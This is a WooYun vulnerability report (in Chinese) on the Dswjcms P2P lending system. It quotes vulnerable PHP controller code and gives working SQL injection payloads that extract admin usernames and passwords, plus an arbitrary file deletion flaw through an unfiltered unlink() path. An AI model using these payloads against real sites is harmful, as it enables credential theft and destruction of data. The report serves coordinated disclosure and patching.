当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141410

漏洞标题:Dswjcms p2p网贷系统处4sql注入&&任意文件删除

相关厂商:Dswjcms

漏洞作者: 路人甲

提交时间:2015-09-24 18:10

修复时间:2015-12-24 17:36

公开时间:2015-12-24 17:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-25: 厂商已经确认,细节仅向厂商公开
2015-09-28: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-11-19: 细节向核心白帽子及相关领域专家公开
2015-11-29: 细节向普通白帽子公开
2015-12-09: 细节向实习白帽子公开
2015-12-24: 细节向公众公开

简要描述:

rt。官网demo

详细说明:

案例参照 http://**.**.**.**/bugs/wooyun-2015-0141209/trace/3789f61a7765dbc4f4a4c7d1b04e6095
--------------------------------------------------------------------------------------
#1
D:/wamp/www/Lib/Action/Home/CenterAction.class.php

public function invest(){
		$this->homeVerify();
		$refund=M('collection');
		$automatic=D('Automatic');
		$this->assign('mid',$this->_get('mid'));
		$isbid=$this->bidRecords(3,0,$this->_session('user_uid'));	
		$this->assign('isbid',$isbid);
		$isclosed=$this->bidRecords(7,0,$this->_session('user_uid'),1);
		$win=$this->bidRecords(9,0,$this->_session('user_uid'),1);
		$this->assign('win',$win);
		$overdue=$this->overdue($this->_session('user_uid'));//逾期信息
		$this->assign('overdue',$overdue);
		$uncollected=$this->bidRecords(11,0,$this->_session('user_uid'),1);
		$this->assign('isclosed',$isclosed);
		
		if($this->_get('bid') && $this->_get('mid')=='plan'){	//还款计划
				$refun=$refund->where('bid='.$this->_get('bid').' and uid='.$this->_session('user_uid'))->order('time ASC')->select();
			$this->assign('refun',$refun);
		}
		$active['center']='active';
		$this->assign('active',$active);
		
		$this->display();
    }


$this->_get('mid') 没有过滤直接带入了查询。
注册用户后 

Center/invest.html?mid=plan&bid=1) UNION SELECT 1,(select concat(username,0x5c,password) from ds_admin limit 1),3,4,5,6,7,8%23


1.png


#2
D:/wamp/www/Lib/Action/Home/BorrowAction.class.php

public function index(){
		$linkage=$this->borrowLinkage();
		$this->assign('linkage',$linkage);
		//标题、关键字、描述
		$Site = D("Site");
		$site=$Site->field('keyword,remark,title,link')->where('link="'.$_SERVER['REQUEST_URI'].'"')->find();
		$this->assign('si',$site);
		$active['borrow']='active';
		$this->assign('active',$active);
		$head='<link  href="__PUBLIC__/css/style.css" rel="stylesheet">';
		$this->assign('head',$head);
		$Borrow=D("Borrowing");
		$borrow=$Borrow->where('uid='.$this->_session('user_uid').' and id='.$this->_get('mid'))->find();
		$borrow['data']=array_filter(explode(",",$borrow['data']));
		$this->assign('b',$borrow);
		$this->display();
    }


同理

Borrow.html?mid=1) UNION SELECT 1,2,3,(select concat(username,0x5c,password) from ds_admin limit 1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%23


2.png


#3 D:/wamp/www/Lib/Action/Home/CenterAction.class.php

public function stationview(){
		$this->homeVerify();
		$msgTools = A('msg','Event');
		$instation=M('instation');
		$msgCount = $msgTools->msgSingle($this->_post('id'));
		if($msgCount){
			$instation->where('id='.$this->_post('id'))->save(array("rd"=>1));
		}
		$count.='<div class="basic_single">
				<h5>'.$msgCount[0]['title'].'</h5>
				<div>发件人:'.$msgCount[0]['hostname'].'</div>
				<div>发件时间:'.date('Y-m-d H:i:s',$msgCount[0]['addline']).'</div>
				<div>'.$msgCount[0]['msg'].'</div>
				<form class="form-horizontal" method="post" action="'.__ROOT__.'/Center/stationreply.html">
				<input name="id" type="hidden" value="'.$this->_post('id').'" />
				<input name="title" type="hidden" value="对'.$msgCount[0]['title'].'的回复" />
				';
				//if($msgCount[0]['hostname']=='admin'){	//系统信息不能回复
					//$count.='<div><a href="#" class="btn disabled reply">回复</a>';
				//}else{
					//$count.='<div><button class="btn btn-primary reply" type="submit">回复</button>';
				//}
				$count.='<a class="btn btn-info" href="'.$_SERVER["HTTP_REFERER"].'">返回</a></button>
				</div>
				</form>
			</div>
		';
		echo $count;
    }


$this->_post('id') 没有过滤 带入了查询。
Center/stationview.html
post:
id=111) UNION SELECT 1,2,3,4,5,6,7,8,user(),10,11,12,13,14%23

3.png


#4
/Lib/Action/Home/CenterAction.class.php 

public function stationexit(){
		$this->homeVerify();
		$msgTools = A('msg','Event');
		$instation=M('instation');
		$result=$instation->where('id='.$this->_get('id'))->delete();

if($result){
$this->success("删除成功");

}else{
$this->error("删除失败");
}
}
get id delete型注入。盲注。
#5
D:/wamp/www/Lib/Action/SharingAction.class.php

public function pathExit(){
		$path=$this->_post('img');
		if(file_exists($path)){	//存在图片
			unlink($path);	//删除它
		}
    }


由于img参数无任何过滤。导致可以全站任意文件删除。

漏洞证明:

2.png


1.png


修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-09-25 17:35

厂商回复:

暂未建立与网站管理单位的直接处置渠道,待认领.

最新状态:

暂无

漏洞评价:

评价